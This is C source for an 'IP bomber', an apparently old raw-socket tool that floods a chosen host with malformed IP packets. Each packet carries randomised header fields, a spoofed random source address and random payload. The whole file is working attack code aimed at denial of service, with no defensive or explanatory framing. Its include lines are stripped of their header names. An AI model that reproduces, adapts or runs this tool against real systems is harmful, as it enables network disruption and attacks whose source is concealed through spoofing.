/* IP bomber */ /* iniquity sleight */ #define DEBUG #include #include #include #include #include #include #include #include #ifndef __linux__ #include #include #else #include #include #include #include #include "/usr/src/linux/net/inet/skbuff.h" #endif #include static unsigned int wait_time = 0; static unsigned int packet_size = 80; static unsigned int packet_count = 1000; static int gateway = 0x0100007f; static int destination = 0; static unsigned int uflag = 0; static unsigned int tflag = 0; static int socket_fd; static struct sockaddr dest; /* Convert an ASCII string to binary IP. Borrowed from linux/net/inet/utils.c */ unsigned long in_aton(char *str) { unsigned long l; unsigned int val; int i; l = 0; for (i = 0; i < 4; i++) { l <<= 8; if (*str != '\0') { val = 0; while (*str != '\0' && *str != '.') { val *= 10; val += *str - '0'; str++; } l |= val; if (*str != '\0') str++; } } return(htonl(l)); } void print_usage () { fprintf(stderr, "Usage: ipbomber [-w time] [-s packet_size] [-c packets_count] host\n"); exit (1); } void get_options (int argc, char *argv[]) { extern int optind; extern char *optarg; int c; while (( c = getopt (argc, argv, "r:c:w:s:g:")) > 0) { switch (c) { case 'w' : wait_time = atoi (optarg); break; case 's' : packet_size = atoi (optarg); break; case 'c' : packet_count = atoi (optarg); break; case 'g' : gateway = in_aton (optarg); break; case 'r' : srand (atoi (optarg)); break; case 't' : tflag ++; break; case 'u' : uflag ++; break; default : print_usage (); } } if ( optind >= argc ) print_usage (); destination = in_aton (argv[optind]); #ifdef DEBUG fprintf (stderr, "Wait time = %d\n", wait_time); fprintf (stderr, "Maximum packet size = %d\n", packet_size); fprintf (stderr, "Packets count = %d\n", packet_count); fprintf (stderr, "Destination = %08x\n", destination); fprintf (stderr, "Gateway = %08x\n", gateway); if (tflag) fprintf (stderr, "TCP option enabled\n"); if (uflag) fprintf (stderr, "UDP option enabled\n"); #endif } void init_raw_socket() { unsigned int sndlen, ssndlen, optlen = sizeof (ssndlen); int fl; if ( (socket_fd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0 ) { perror ("ipbomb : socket "); exit (1); } #ifdef __linux__ sndlen = packet_size + 128 + 1 + sizeof (struct sk_buff); #else sndlen = packet_size; #endif if ( setsockopt (socket_fd, SOL_SOCKET, SO_SNDBUF, (char *) &sndlen, sizeof (sndlen) ) ) { perror ("ipbomb : setsockopt (..., ..., SO_SNDBUF,...) "); exit (1); } if ( getsockopt (socket_fd, SOL_SOCKET, SO_SNDBUF, (char *) &ssndlen, &optlen) ) { perror ("ipbomb : getsockopt (..., ..., SO_SNDBUF,...) "); exit (1); } if ( ssndlen != sndlen ) { fprintf (stderr, "ipbomb: maximum packet size to big.\n"); exit (1); } fl = fcntl ( socket_fd, F_GETFL, 0); fl |= O_NONBLOCK; fcntl ( socket_fd, F_SETFL, fl); } void close_raw_socket() { close (socket_fd); } void send_packet( char *bomb, int len ) { int i; i = sendto (socket_fd, bomb, len, 0, &dest, sizeof (dest)); /* if ( i != packet_size ) { perror ("ipbomb : sendto "); exit (1); } */ } void generate_packet( char *bomb ) { struct ip * iph = (struct ip *) bomb; unsigned int i; unsigned int len = packet_size * (rand() & 0xffff) >> 16 ; assert ( len < packet_size ); /* FIX */ iph->ip_v = IPVERSION; iph->ip_hl = 5; iph->ip_sum = 0; iph->ip_len = htons(len); /* Random options */ #define SET_RAND(_a) iph->_a = rand() & ((1 << (sizeof (iph->_a) * 8)) - 1) SET_RAND(ip_tos); SET_RAND(ip_id); SET_RAND(ip_ttl); SET_RAND(ip_off); SET_RAND(ip_p); #undef SET_RAND iph->ip_src.s_addr = rand(); iph->ip_dst.s_addr = destination ? destination : rand(); for ( i = sizeof (struct ip); i < len; i++) bomb[i] = rand() & 255; send_packet(bomb, len); } void main (int argc, char *argv[]) { int i; char * bomb; struct sockaddr_in * inet_dest = (struct sockaddr_in *) & dest; srand (time (NULL)); get_options (argc, argv); bzero (&dest, sizeof (dest)); inet_dest->sin_family = AF_INET; inet_dest->sin_addr.s_addr = gateway; if ( (bomb = malloc(packet_size)) == NULL) { perror ("ipbomber: malloc"); exit(1); } init_raw_socket(); for ( i = 0; i < packet_count; i++ ) { generate_packet (bomb); } close_raw_socket(); }